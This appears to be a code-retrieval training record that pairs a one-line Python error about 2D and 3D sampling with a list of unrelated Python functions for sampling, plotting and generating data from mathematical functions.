raise ValueError("Only 2d and 3d sampling are supported at this time.") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def sample3d(f, x_args, y_args):\n x, x_min, x_max, x_n = None, None, None, None\n y, y_min, y_max, y_n = None, None, None, None\n try:\n f = sympify(f)\n except SympifyError:\n raise ValueError(\"f could not be interpreted as a SymPy function\")\n try:\n x, x_min, x_max, x_n = x_args\n y, y_min, y_max, y_n = y_args\n except (TypeError, IndexError):\n raise ValueError(\"x_args and y_args must be tuples of the form (var, min, max, intervals)\")\n\n x_l = float(x_max - x_min)\n x_d = x_l/float(x_n)\n x_a = np.arange(float(x_min), float(x_max) + x_d, x_d)\n\n y_l = float(y_max - y_min)\n y_d = y_l/float(y_n)\n y_a = np.arange(float(y_min), float(y_max) + y_d, y_d)\n\n def meshgrid(x, y):\n \"\"\"\n Taken from matplotlib.mlab.meshgrid.\n \"\"\"\n x = np.array(x)\n y = np.array(y)\n numRows, numCols = len(y), len(x)\n x.shape = 1, numCols\n X = np.repeat(x, numRows, 0)\n\n y.shape = numRows, 1\n Y = np.repeat(y, numCols, 1)\n return X, Y\n\n X, Y = np.meshgrid(x_a, y_a)\n\n Z = np.ndarray((len(X), len(X[0])))\n for j in range(len(X)):\n for k in range(len(X[0])):\n try:\n Z[j][k] = float(f.subs(x, X[j][k]).subs(y, Y[j][k]))\n except (TypeError, NotImplementedError):\n Z[j][k] = 0\n return X, Y, Z",
"def sample2d(f, x_args):\n try:\n f = sympify(f)\n except SympifyError:\n raise ValueError(\"f could not be interpreted as a SymPy function\")\n try:\n x, x_min, x_max, x_n = x_args\n except (TypeError, IndexError):\n raise ValueError(\"x_args must be a tuple of the form (var, min, max, n)\")\n\n x_l = float(x_max - x_min)\n x_d = x_l/float(x_n)\n X = np.arange(float(x_min), float(x_max) + x_d, x_d)\n\n Y = np.empty(len(X))\n for i in range(len(X)):\n try:\n Y[i] = float(f.subs(x, X[i]))\n except TypeError:\n Y[i] = None\n return X, Y",
"def __create_sample_data__(npts = 20):\n\t#data function\n\tdef wavy(x, y):\n\t\treturn np.sin(0.2*np.pi*x)*np.cos(0.4*np.pi*y)\n\t\n\t#make grid\n\txs = np.linspace(0, 2*20, 2*npts + 1)\n\tys = np.linspace(0, 20, npts + 1)\n\t(xgrid, ygrid) = np.meshgrid(xs, ys)\n\tzgrid = wavy(xgrid, ygrid)\n\t\n\treturn (xgrid, ygrid, zgrid)",
"def generate_data(values, function=non_linear_fn, length=25, range_=[-1, 1]):\n\n # build x vector\n x = np.linspace(range_[0], range_[1], length)\n\n data = np.zeros((values.shape[0], length))\n\n for i in range(values.shape[0]):\n data[i, :] = function(x, values[i, 0], values[i, 1], values[i, 2])\n\n return data",
"def gendata(params,xmin,xmax,npts=4000):\n F = lorentzian.ForwardFactory\n def gensample(F, xmin, xmax):\n from numpy import arange\n import random\n a = arange(xmin, xmax, (xmax-xmin)/200.)\n ymin = 0\n ymax = F(a).max()\n while 1:\n t1 = random.random() * (xmax-xmin) + xmin\n t2 = random.random() * (ymax-ymin) + ymin\n t3 = F(t1)\n if t2 < t3:\n return t1\n fwd = F(params)\n return array([gensample(fwd, xmin,xmax) for i in xrange(npts)])",
"def random_resample(*args, samples,\n function=None, function_kwargs=None, bundle_args=True,\n replace=True):\n samples_spec = samples.copy() # copy because use pop below\n args_sub = [obj.copy() for obj in args]\n dim_block_1 = [d for d, s in samples_spec.items() if s[1] == 1]\n\n # Do all dimensions with block_size = 1 together\n samples_block_1 = { dim: samples_spec.pop(dim) for dim in dim_block_1 }\n random_samples = {dim: \n np.random.choice(\n len(args_sub[0][dim]),\n size=n,\n replace=replace)\n for dim, (n, _) in samples_block_1.items()}\n args_sub = [obj.isel(\n {dim: random_samples[dim] \n for dim in (set(random_samples.keys()) & set(obj.dims))}) for obj in args_sub]\n\n # Do any remaining dimensions\n for dim, (n, block_size) in samples_spec.items():\n n_blocks = int(n / block_size)\n random_samples = [slice(x,x+block_size) \n for x in np.random.choice(\n len(args_sub[0][dim])-block_size+1, \n size=n_blocks,\n replace=replace)]\n args_sub = [xr.concat([obj.isel({dim: random_sample}) \n for random_sample in random_samples],\n dim=dim) \n if dim in obj.dims else obj \n for obj in args_sub]\n\n if function:\n if bundle_args:\n if function_kwargs is not None:\n res = function(*args_sub, **function_kwargs)\n else:\n res = function(*args_sub)\n else:\n if function_kwargs is not None:\n res = tuple([function(obj, **function_kwargs) for obj in args_sub])\n else:\n res = tuple([function(obj) for obj in args_sub])\n else:\n res = tuple(args_sub,)\n\n if isinstance(res, tuple):\n if len(res) == 1:\n return res[0]\n else:\n return res",
"def sample(self,f,N,p=100):\n return [f(x) for x in np.linspace(0,N,p)]",
"def evaluate_1darray_function_on_2d_array(function, samples, opts=None):\n num_args = get_num_args(function)\n assert samples.ndim == 2\n num_samples = samples.shape[1]\n if num_args == 2:\n values_0 = function(samples[:, 0], opts)\n else:\n values_0 = function(samples[:, 0])\n values_0 = np.atleast_1d(values_0)\n assert values_0.ndim == 1\n num_qoi = values_0.shape[0]\n values = np.empty((num_samples, num_qoi), float)\n values[0, :] = values_0\n for i in range(1, num_samples):\n if num_args == 2:\n values[i, :] = function(samples[:, i], opts)\n else:\n values[i, :] = function(samples[:, i])\n\n return values",
"def plot_multidimensional_function_slices(\n func: Callable[[np.ndarray], NDAorTuple],\n slice_loc: np.ndarray,\n bounds: Union[np.ndarray, List[Tuple[float, float]]],\n input_names: Optional[List[str]] = None,\n obs_points: Optional[Union[np.ndarray, List[np.ndarray]]] = None,\n input_scales: Optional[List[PLOT_SCALE]] = None,\n output_scale: PLOT_SCALE = \"linear\",\n output_label: str = \"Objective Value\",\n size: float = 3,\n slice_2d_resolution: int = 50,\n # slide_1d_resolution: int = 100,\n func_returns_confidence_intervals: bool = False,\n) -> Tuple[plt.Figure, np.ndarray]:\n # Input validation checks\n assert output_scale in [\"linear\", \"log\", \"symlog\"]\n\n def func_return_just_mean(x):\n \"\"\"\n If the supplied function is a predictor returning lower and upper confidence bounds as well as mean,\n return just the mean prediction. If not, return the function value evaluated at x.\n \"\"\"\n return func(x)[0] if func_returns_confidence_intervals else func(x)\n\n n_dims: int = len(bounds)\n # If multiple batches of points supplied as a list in obs_points, make a colour palette\n n_batches = len(obs_points) if isinstance(obs_points, (list, tuple)) else 1\n scatter_colours = sns.color_palette(\"viridis\", n_colors=n_batches)\n # If input_scales not specified, default all to 'linear'\n input_scales = input_scales if input_scales else [\"linear\"] * n_dims # type: ignore # auto\n # Keep track of contour sets returned for each axis\n contour_sets = []\n\n # Construct axes\n fig = plt.figure(figsize=(size * n_dims, size * n_dims))\n axes, cbar_axes = make_lower_triangular_axis_grid_with_colorbar_axes(\n fig=fig, num_cols=n_dims, num_colorbars=2, share_y_on_diagonal=True\n )\n\n # Keep a running minimum and maximum of function values in 2D slices\n func_values_min: float = np.inf\n func_values_max: float = -np.inf\n\n with sns.axes_style(\"darkgrid\"):\n for i in range(n_dims): # i iterates over the rows of the plots\n for j in range(n_dims): # j iterates over the columns of the plots\n ax = axes[i, j]\n # 1D-slice plots along the diagonal\n if i == j:\n if func_returns_confidence_intervals:\n plot_1d_slice_through_function_with_confidence_intervals(\n func, # type: ignore\n dim=i,\n slice_loc=slice_loc,\n slice_bounds=bounds[i],\n ax=ax,\n x_scale=input_scales[i],\n )\n else:\n plot_1d_slice_through_function(\n func, # type: ignore\n dim=i,\n slice_loc=slice_loc,\n slice_bounds=bounds[i],\n ax=ax,\n x_scale=input_scales[i],\n )\n ax.set_yscale(output_scale)\n\n # lower triangle\n elif i > j:\n dim_x, dim_y = j, i\n # Compute the data for the 2D slice plots\n xx, yy, func_values_slice = calc_2d_slice(\n func=func_return_just_mean, # type: ignore # auto\n dim_x=dim_x,\n dim_y=dim_y,\n slice_loc=slice_loc,\n slice_bounds_x=bounds[dim_x],\n slice_bounds_y=bounds[dim_y],\n x_scale=input_scales[dim_x],\n y_scale=input_scales[dim_y],\n resolution=slice_2d_resolution,\n )\n # Plot the 2D slice\n _, im = plot_2d_slice_from_arrays(\n xx,\n yy,\n func_values_slice,\n ax=ax,\n x_scale=input_scales[dim_x],\n y_scale=input_scales[dim_y],\n output_scale=output_scale,\n )\n contour_sets.append(im)\n # Keep a running minimum and maximum of function values in slices\n func_values_min = min(func_values_min, func_values_slice.min()) # type: ignore\n func_values_max = max(func_values_max, func_values_slice.max()) # type: ignore\n # Scatter points on the slices if given\n if obs_points is not None: # pragma: no cover\n if isinstance(obs_points, np.ndarray):\n # If just one array given, scatter with the 
colour reflecting objective value\n ax.scatter(\n obs_points[:, dim_x], obs_points[:, dim_y], color=scatter_colours[0], s=20, zorder=15\n )\n else:\n assert isinstance(obs_points, (list, tuple))\n # If multiple arrays given, colour the points according to the batch number\n for batch_num, batch_arr in enumerate(obs_points):\n ax.scatter(\n batch_arr[:, dim_x],\n batch_arr[:, dim_y],\n color=scatter_colours[batch_num],\n s=25,\n lw=0.0,\n alpha=0.8,\n zorder=15,\n )\n # Add axis labels\n if input_names is not None: # pragma: no cover\n # If plot in the first column (but not first row), add a y_label\n if i != 0 and j == 0:\n axes[i, j].set_ylabel(input_names[i])\n # If plot is at the bottom, add an x_label\n if i == n_dims - 1:\n axes[i, j].set_xlabel(input_names[j])\n if i >= j:\n # Remove redundant ticks on inner plots\n if i != n_dims - 1:\n axes[i, j].xaxis.set_visible(False)\n if j != 0:\n axes[i, j].yaxis.set_visible(False)\n # # Prune the upper-most tick from plot, so that the ticks don't overlap each other between plots\n # ax.yaxis.set_major_locator(ticker.MaxNLocator(prune='upper'))\n ax.tick_params(axis=\"both\", which=\"major\", labelsize=9)\n ax.tick_params(axis=\"both\", which=\"minor\", labelsize=6)\n # Update the colour limits of the slice plots\n for contour_set in contour_sets:\n contour_set.set_clim(vmin=func_values_min, vmax=func_values_max)\n # Add the colourbars\n if n_dims > 1:\n # make a colourbar for the contour plots\n cb1 = fig.colorbar(contour_sets[-1], cax=cbar_axes[0], aspect=50)\n cb1.set_label(output_label)\n cbar_axes[0].yaxis.set_ticks_position(\"left\")\n # make a colourbar for different batches\n if n_batches > 1: # pragma: no cover\n cb2 = matplotlib.colorbar.ColorbarBase( # type: ignore # auto\n cbar_axes[1],\n cmap=matplotlib.colors.ListedColormap(scatter_colours),\n boundaries=[x - 0.5 for x in range(n_batches + 1)],\n ticks=list(range(n_batches)),\n spacing=\"proportional\",\n )\n cb2.set_label(\"Batch Number\")\n else:\n cbar_axes[1].set_visible(False)\n return fig, axes",
"def create_samples(f: Callable[..., int], n_args: int, n_bits: int,\n) -> Dict[Tuple[int, ...], Tuple[int, ...]]:\n samples = {}\n max_arg = 2 ** n_bits\n for inputs in itertools.product((0, 1), repeat=n_args * n_bits):\n ints = [int(\"\".join(str(bit) for bit in inputs[i:i + n_bits]), 2)\n for i in range(0, len(inputs), n_bits)]\n try:\n output = f(*ints)\n if 0 <= output < max_arg:\n bit_string = (\"{:0\" + str(n_bits) + \"b}\").format(output)\n samples[inputs] = tuple(int(bit) for bit in bit_string)\n except ZeroDivisionError:\n pass\n return samples",
"def create_data(f, x_vals):\n y_vals = []\n for i in x_vals:\n y_vals.append(f(x_vals[i]))\n return np.array(y_vals)",
"def get_data_args(data_func, nfuncs):\n if data_func.__name__ == 'gg_1d':\n # first arg is sorted\n if nfuncs == 1:\n data_args = [{'a': 0.75, 'mu': 0.4, 'sigma': 0.3, 'beta': 2.0}]\n elif nfuncs == 2:\n data_args = [{'a': 0.2, 'mu': 0.4, 'sigma': 0.6, 'beta': 5.0},\n {'a': 0.55, 'mu': 0.4, 'sigma': 0.2, 'beta': 4.0}]\n elif nfuncs == 3:\n data_args = [{'a': 0.2, 'mu': 0.4, 'sigma': 0.6, 'beta': 5.0},\n {'a': 0.35, 'mu': 0.6, 'sigma': 0.07, 'beta': 2.0},\n {'a': 0.55, 'mu': 0.32, 'sigma': 0.14, 'beta': 6.0}]\n elif nfuncs == 4:\n data_args = [{'a': 0.2, 'mu': 0.3, 'sigma': 0.5, 'beta': 5.0},\n {'a': 0.4, 'mu': 0.65, 'sigma': 0.07, 'beta': 2.0},\n {'a': 0.6, 'mu': 0.25, 'sigma': 0.1, 'beta': 6.0},\n {'a': 0.9, 'mu': 0.95, 'sigma': 0.1, 'beta': 6.0}]\n elif data_func.__name__ == 'ta_1d':\n # first arg is sorted\n if nfuncs == 1:\n data_args = [{'a': 0.8, 'w_0': 0.0, 'w_1': 1.5}]\n elif nfuncs == 2:\n data_args = [{'a': 0.7, 'w_0': -1, 'w_1': 3},\n {'a': 0.9, 'w_0': 2, 'w_1': -3}]\n elif nfuncs == 3:\n data_args = [\n {'a': 0.6, 'w_0': -7, 'w_1': 8},\n {'a': 1, 'w_0': -1, 'w_1': 3},\n {'a': 1.4, 'w_0': 2, 'w_1': -3}]\n elif data_func.__name__ == 'gg_2d':\n # the order is (with first arg sorted):\n # [a_1, mu1_1, mu2_1, s1_1, s2_1, b1_1, b2_1, rot angle]\n if nfuncs == 1:\n data_args = [\n {'a': 0.8, 'mu1': 0.6, 'mu2': 0.6, 'sigma1': 0.1,\n 'sigma2': 0.2, 'beta1': 2, 'beta2': 2, 'omega': 0.1 * np.pi}]\n elif nfuncs == 2:\n data_args = [\n {'a': 0.5, 'mu1': 0.5, 'mu2': 0.4, 'sigma1': 0.4,\n 'sigma2': 0.2, 'beta1': 2, 'beta2': 2, 'omega': 0},\n {'a': 0.8, 'mu1': 0.5, 'mu2': 0.6, 'sigma1': 0.1,\n 'sigma2': 0.1, 'beta1': 2, 'beta2': 2, 'omega': 0}]\n elif nfuncs == 3:\n data_args = [\n {'a': 0.5, 'mu1': 0.3, 'mu2': 0.7, 'sigma1': 0.2,\n 'sigma2': 0.2, 'beta1': 2, 'beta2': 2, 'omega': 0},\n {'a': 0.7, 'mu1': 0.7, 'mu2': 0.6, 'sigma1': 0.15,\n 'sigma2': 0.15, 'beta1': 2, 'beta2': 2, 'omega': 0},\n {'a': 0.9, 'mu1': 0.4, 'mu2': 0.3, 'sigma1': 0.1,\n 'sigma2': 0.1, 'beta1': 2, 'beta2': 2, 'omega': 0}]\n try:\n data_args_list = []\n for name in bf.get_bf_param_names(data_func):\n data_args_list += [d[name] for d in data_args]\n return data_args_list\n except NameError:\n raise AssertionError('no data args found! func={} nfuncs={}'.format(\n data_func.__name__, nfuncs))",
"def test_exercise_1():\n a, b = 5, 0\n fvals = []\n grid = np.linspace(-3, 4)\n for value in grid:\n fvals.append(get_test_function(value, a, b))\n plt.plot(grid, fvals)",
"def monte_carlo_sample(f, bounds, n_samples):\r\n samples = []\r\n pmax = f(bounds[0])\r\n tries_per_run = int(n_samples*1/pmax)\r\n while len(samples) < n_samples:\r\n x = np.random.rand(tries_per_run)*(bounds[1]-bounds[0])+bounds[0]\r\n y = np.random.rand(tries_per_run)*pmax\r\n good = x[y <= f(x)]\r\n samples = samples + [i for i in x[y <= f(x)]]\r\n return np.array(np.array(samples))[:n_samples]",
"def sample_data_input_fn(params):\n window_size = params['window_size']\n batch_size = params['batch_size']\n\n dataset_names = sample_data.get_data_names()\n all_downsampled = [sample_data.get_downsampled_data(name) for name in dataset_names]\n np_dtype = all_downsampled[0].dtype\n _, num_columns = all_downsampled[0].shape\n assert num_columns == 3\n\n # For each data item, this computes\n time_diffs = [(x[1:, 0] - x[:-1, 0]) for x in all_downsampled]\n median_time_diff = np.median(np.concatenate(time_diffs, axis=0))\n lower, upper = median_time_diff * 0.8, median_time_diff * 1.2\n valid_start_window_indices = [\n get_window_valid_indices(d, lower, upper, window_size) for d in time_diffs\n ]\n for name, valid_indices in zip(dataset_names, valid_start_window_indices):\n if np.size(valid_indices) == 0:\n raise ValueError(\"{} has no valid window ranges\".format(name))\n\n def get_samples_py_op(idx_array):\n assert isinstance(idx_array, np.ndarray)\n assert idx_array.shape == (batch_size, )\n samp_results = np.zeros((batch_size, window_size, num_columns), dtype=np_dtype)\n for i, sample_idx in enumerate(idx_array):\n start_idx = random.choice(valid_start_window_indices[sample_idx])\n samp_results[i, :, :] = all_downsampled[sample_idx][start_idx: (\n start_idx + window_size)]\n assert samp_results.shape == (batch_size, window_size, num_columns)\n return samp_results\n\n def get_window_sample(idx_tensor):\n samples = tf.py_func(get_samples_py_op, [idx_tensor], np_dtype)\n samples.set_shape((batch_size, window_size, num_columns))\n return samples\n\n def random_negative_py_op(idx_array):\n assert isinstance(idx_array, np.ndarray)\n neg_idx_array = np.copy(idx_array)\n for i, idx in enumerate(idx_array):\n while neg_idx_array[i] == idx_array[i]:\n neg_idx_array[i] = random.randint(0, len(all_downsampled) - 1)\n return neg_idx_array\n\n def get_negative_window_sample(idx_tensor):\n neg_idx_tensor = tf.py_func(\n random_negative_py_op,\n [idx_tensor],\n idx_tensor.dtype)\n return get_window_sample(neg_idx_tensor)\n\n # Current sample method: First select sample index, then select window.\n num_samples = len(all_downsampled)\n if num_samples < 2:\n raise ValueError(\"Need at least 2 light curves for negative samples!\")\n dataset = tf.data.Dataset.range(num_samples)\n dataset = dataset.repeat().shuffle(num_samples * 2).batch(batch_size)\n\n positive = dataset.map(lambda idx_tensor: {\n 'left': get_window_sample(idx_tensor),\n 'right': get_window_sample(idx_tensor),\n 'goal': tf.constant([1.0] * batch_size, dtype=tf.float64)\n })\n negative = dataset.map(lambda idx_tensor: {\n 'left': get_window_sample(idx_tensor),\n 'right': get_negative_window_sample(idx_tensor),\n 'goal': tf.constant([0.0] * batch_size, dtype=tf.float64)\n })\n\n # TODO(gatoatigrado): Experiment with shuffling positive & negative within a batch.\n # Currently each batch is just positive or negative.\n assert positive.output_shapes == negative.output_shapes\n assert negative.output_types == positive.output_types\n dataset = tf.contrib.data.sample_from_datasets((positive, negative))\n assert dataset.output_shapes == negative.output_shapes\n return dataset",
"def sample_function(\n function: _vtk.vtkImplicitFunction,\n bounds: Sequence[float] = (-1.0, 1.0, -1.0, 1.0, -1.0, 1.0),\n dim: Sequence[int] = (50, 50, 50),\n compute_normals: bool = False,\n output_type: np.dtype = np.double, # type: ignore\n capping: bool = False,\n cap_value: float = sys.float_info.max,\n scalar_arr_name: str = \"scalars\",\n normal_arr_name: str = \"normals\",\n progress_bar: bool = False,\n):\n samp = _vtk.vtkSampleFunction()\n samp.SetImplicitFunction(function)\n samp.SetSampleDimensions(dim)\n samp.SetModelBounds(bounds)\n samp.SetComputeNormals(compute_normals)\n samp.SetCapping(capping)\n samp.SetCapValue(cap_value)\n samp.SetNormalArrayName(normal_arr_name)\n samp.SetScalarArrayName(scalar_arr_name)\n\n if output_type == np.float64:\n samp.SetOutputScalarTypeToDouble()\n elif output_type == np.float32:\n samp.SetOutputScalarTypeToFloat()\n elif output_type == np.int64:\n if os.name == 'nt':\n raise ValueError('This function on Windows only supports int32 or smaller')\n samp.SetOutputScalarTypeToLong()\n elif output_type == np.uint64:\n if os.name == 'nt':\n raise ValueError('This function on Windows only supports int32 or smaller')\n samp.SetOutputScalarTypeToUnsignedLong()\n elif output_type == np.int32:\n samp.SetOutputScalarTypeToInt()\n elif output_type == np.uint32:\n samp.SetOutputScalarTypeToUnsignedInt()\n elif output_type == np.int16:\n samp.SetOutputScalarTypeToShort()\n elif output_type == np.uint16:\n samp.SetOutputScalarTypeToUnsignedShort()\n elif output_type == np.int8:\n samp.SetOutputScalarTypeToChar()\n elif output_type == np.uint8:\n samp.SetOutputScalarTypeToUnsignedChar()\n else:\n raise ValueError(f'Invalid output_type {output_type}')\n\n _update_alg(samp, progress_bar=progress_bar, message='Sampling')\n return wrap(samp.GetOutput())",
"def iid_sample_fn(*args, **kwargs):\n\n with tf.name_scope('iid_sample_fn'):\n\n seed = kwargs.pop('seed', None)\n if samplers.is_stateful_seed(seed):\n kwargs = dict(kwargs, seed=SeedStream(seed, salt='iid_sample')())\n def pfor_loop_body(_):\n with tf.name_scope('iid_sample_fn_stateful_body'):\n return sample_fn(*args, **kwargs)\n else:\n # If a stateless seed arg is passed, split it into `n` different\n # stateless seeds, so that we don't just get a bunch of copies of the\n # same sample.\n if not JAX_MODE:\n warnings.warn(\n 'Saw Tensor seed {}, implying stateless sampling. Autovectorized '\n 'functions that use stateless sampling may be quite slow because '\n 'the current implementation falls back to an explicit loop. This '\n 'will be fixed in the future. For now, you will likely see '\n 'better performance from stateful sampling, which you can invoke '\n 'by passing a Python `int` seed.'.format(seed))\n seed = samplers.split_seed(seed, n=n, salt='iid_sample_stateless')\n def pfor_loop_body(i):\n with tf.name_scope('iid_sample_fn_stateless_body'):\n return sample_fn(*args, seed=tf.gather(seed, i), **kwargs)\n\n if static_n == 1:\n draws = pfor_loop_body(0)\n else:\n draws = parallel_for.pfor(pfor_loop_body, n)\n return tf.nest.map_structure(unflatten, draws, expand_composites=True)",
"def sample_dimension(data, dimension, n_frames, scheme=\"linear\"):\n d_data = [i[:,dimension][:,np.newaxis] for i in data]\n\n #sort it because all three sampling schemes use it\n\n all_vals = []\n for i in d_data:\n all_vals.extend(i.flatten())\n all_vals = np.sort(all_vals)\n\n #get lineraly placed points\n if scheme==\"linear\":\n max_val = all_vals[-1]\n min_val = all_vals[0]\n spaced_points = np.linspace(min_val, max_val, n_frames)\n\n elif scheme==\"random\":\n spaced_points = np.sort(np.random.choice(all_vals, n_frames))\n\n elif scheme==\"edge\":\n _cut_point = np.int(n_frames / 2)\n spaced_points = np.hstack((all_vals[:_cut_point], all_vals[-_cut_point:]))\n else:\n raise ValueError(\"Scheme has be to one of linear, random or edge\")\n\n tree = KDTree(d_data)\n\n return_vec = []\n for pt in spaced_points:\n dis, ind = tree.query([pt])\n return_vec.append(ind)\n\n return return_vec",
"def n_random_resamples(*args, samples, n_repeats, \n function=None, function_kwargs=None, bundle_args=True, \n replace=True, with_dask=True):\n\n if with_dask & (n_repeats > 1000):\n n_args = itertools.repeat(args[0], times=n_repeats)\n b = db.from_sequence(n_args, npartitions=100)\n rs_list = b.map(random_resample, *(args[1:]), \n **{'samples':samples, 'function':function, \n 'function_kwargs':function_kwargs, 'replace':replace}).compute()\n else: \n resample_ = dask.delayed(random_resample) if with_dask else random_resample\n rs_list = [resample_(*args,\n samples=samples,\n function=function,\n function_kwargs=function_kwargs,\n bundle_args=bundle_args,\n replace=replace) for _ in range(n_repeats)] \n if with_dask:\n rs_list = dask.compute(rs_list)[0]\n \n if all(isinstance(r, tuple) for r in rs_list):\n return tuple([xr.concat([r.unify_chunks() for r in rs], dim='k') for rs in zip(*rs_list)])\n else:\n return xr.concat([r.unify_chunks() for r in rs_list], dim='k')",
"def run_f(df, sample_number):\n samples = normal_custom(df.get(Model.MEAN_KEY), df.get(Model.STD_KEY), n_sample=sample_number) # Normal_custom imported from helper_func\n return samples",
"def blumli(function, resolution, domain):\n\t# fugly hacks galore to determine dimensions\n\tinput_dim = len(inspect.getargspec(function).args)\n\toutsample = function( *range(input_dim))\n\toutput_dim = len(list( outsample )) if isinstance(outsample, collections.Iterable) else 1\n\n\tif input_dim == 1:\n\t\tdomain = [(domain[0], domain[1])]\n\n\tunits = [(domain[dim][1]-domain[dim][0])/resolution for dim in range(input_dim) ]\n\n\t# first layer: for each input dimension, we have resolution-1 neurons, each with input_dim inputs\n\tfirst_layer = []\n\tfor dimension in range(input_dim):\n\t\tinput_weights = [1 if dim==dimension else 0 for dim in range(input_dim)]\n\t\tfirst_layer.extend( [Perceptron([domain[dimension][0]+num*units[dimension]] + input_weights, step_function) for num in range(1,resolution)] )\n\n\tsecond_layer = []\n\txs = { }\n\tfor square in product(range(resolution), repeat=input_dim):\n\t\tweights = [0]*len(first_layer)\n\t\tbias = -0.5\n\t\txvalues = [None]*len(square)\n\t\tfor dimension, area in enumerate(square):\n\t\t\thb = area\n\t\t\tlb = area-1\n\n\t\t\tif lb >= 0:\n\t\t\t\tbias += 1\n\t\t\t\tweights[ (resolution-1)*(dimension) + lb ] = 1\n\n\t\t\tif hb < (resolution-1):\n\t\t\t\tbias += 1\n\t\t\t\tweights[ (resolution-1)*(dimension) + hb ] = -1\n\n\t\t\tmidpoint = lb+0.5 if lb>=0 else hb-0.5\n\t\t\txvalues[dimension] = domain[dimension][0] + (1+midpoint)*units[dimension]\n\n\t\tneuron = Perceptron([bias]+weights, zero_step_function)\n\t\tsecond_layer.append( neuron )\n\t\txs[neuron] = xvalues\n\n\tthird_layer = [\n\t\tPerceptron( [0] + [\n\t\t\tfunction(*xs[neuron]) if output_dim==1 else function(*xs[neuron])[outdim] for neuron in second_layer\n\t\t], identity ) for outdim in range(output_dim)\n\t]\n\n\treturn FFNN([first_layer, second_layer, third_layer])",
"def sample_grid(variable='snow_depth', month=None):\n\n my_func = {'snow_depth': snow_depth,\n 'swe': swe}\n\n lat, lon = np.linspace(65.,90.,20), np.linspace(0.,359.,360)\n \n if not month:\n month = np.arange(1,13)\n else:\n month = np.array(month)\n\n x, y = np.meshgrid(lon, lat)\n\n if month.size == 1:\n da = xr.DataArray(my_func[variable](x,y,month),\n coords={'lat': lat, 'lon': lon},\n dims=['lat', 'lon'])\n else:\n da = xr.DataArray([my_func[variable](x, y, m) for m in month],\n coords={'month': month, 'lat': lat, 'lon': lon},\n dims=['month', 'lat', 'lon'])\n return da",
"def rng_fn_scipy(cls, rng, *args, **kwargs):",
"def interpolate(f, Q, method='linear', y_transect=None):\n if isinstance(f, (ufl.core.expr.Expr, firedrake.Function)):\n return firedrake.interpolate(f, Q)\n\n mesh = Q.mesh()\n element = Q.ufl_element()\n if len(element.sub_elements()) > 0:\n element = element.sub_elements()[0]\n\n V = firedrake.VectorFunctionSpace(mesh, element)\n X = firedrake.interpolate(mesh.coordinates, V).dat.data_ro\n\n q = firedrake.Function(Q)\n\n if isinstance(f, rasterio.DatasetReader):\n q.dat.data[:] = _sample(f, X, method, y_transect)\n elif (isinstance(f, tuple)\n and all(isinstance(fi, rasterio.DatasetReader) for fi in f)):\n for i, fi in enumerate(f):\n q.dat.data[:, i] = _sample(fi, X, method, y_transect)\n else:\n raise ValueError('Argument must be a rasterio data set or a tuple of '\n 'data sets!')\n\n return q",
"def linear_function_dataset(a, b, n=100, show_plot=False):\n x = torch.randn(n, 1)\n y = a*x + b + 0.1*torch.randn(n, 1)\n if show_plot:\n show_TensorFunction1D(x, y, marker='.')\n return TensorDataset(x, y)",
"def nonlinear_function_dataset(n=100, show_plot=False):\n x = torch.rand(n, 1)*20 - 10 # Random values between [-10 and 10]\n y = (-1/100)*x**7 -x**4 -2*x**2 -4*x + 1 + 0.1*torch.randn(n, 1)\n if show_plot:\n show_TensorFunction1D(x, y, marker='.')\n return TensorDataset(x, y)",
"def plot(\n self,\n function: Callable[[float], float],\n x_range: Sequence[float] | None = None,\n use_vectorized: bool = False,\n **kwargs,\n ):\n\n t_range = np.array(self.x_range, dtype=float)\n if x_range is not None:\n t_range[: len(x_range)] = x_range\n\n if x_range is None or len(x_range) < 3:\n # if t_range has a defined step size, increase the number of sample points per tick\n t_range[2] /= self.num_sampled_graph_points_per_tick\n # For axes, the third coordinate of x_range indicates\n # tick frequency. But for functions, it indicates a\n # sample frequency\n\n graph = ParametricFunction(\n lambda t: self.coords_to_point(t, function(t)),\n t_range=t_range,\n scaling=self.x_axis.scaling,\n use_vectorized=use_vectorized,\n **kwargs,\n )\n graph.underlying_function = function\n return graph",
"def makePLDS(T, x_0, f, g, Dx, Dy):\n\tX = np.zeros((T, Dx))\n\tY = np.zeros((T, Dy))\n\n\tX[0] = x_0\n\tY[0] = g.sample(x_0)\n\tfor t in range(1,T):\n\t\tX[t] = f.sample(X[t-1])\n\t\tY[t] = g.sample(X[t])\n\treturn X, Y",
"def data_fun(times, n_dipoles=4):\n n = 0 # harmonic number\n n_samp = len(times)\n window = np.zeros(n_samp)\n start, stop = [int(ii * float(n_samp) / (2 * n_dipoles)) for ii in (2 * n, 2 * n + 1)]\n window[start:stop] = 1.0\n n += 1\n data = 25e-9 * np.sin(2.0 * np.pi * 10.0 * n * times)\n data *= window\n return data",
"def sampleFunction(x: int, y: float) -> float:\n return x * y",
"def subsampling(a, samples, iterations, func=identity, func_axis=None, dtype=None):\n # Calculate the number of measurements\n n = __number_measurements(a, func_axis)\n # Evaluate the function on the subsampling means\n subsampling_values = [func(*(__array_mean_indices(a, numpy.random.permutation(range(n))[0:samples], func_axis=func_axis, dtype=dtype))) for i in range(iterations)]\n\n # Return the average value and the error of this averaged value\n return numpy.mean(subsampling_values), math.sqrt(float(samples)/float(iterations*(iterations - 1)))*numpy.std(subsampling_values)",
"def test_sampling(self):\n dim = Fidelity(\"epoch\", 1, 2)\n assert dim.sample() == [2]\n dim = Fidelity(\"epoch\", 1, 5)\n assert dim.sample() == [5]\n dim = Fidelity(\"epoch\", 1, 5)\n assert dim.sample(4) == [5] * 4",
"def evaluate_sample(\n param: np.ndarray,\n model: Model,\n data: np.ndarray,\n data_transformation: DataTransformation,\n data_stdevs: np.ndarray,\n slice: np.ndarray,\n) -> typing.Tuple[float, np.ndarray]:\n\n log_samplerresult = eval_log_transformed_density(\n param, model, data, data_transformation, data_stdevs, slice\n )\n return log_samplerresult",
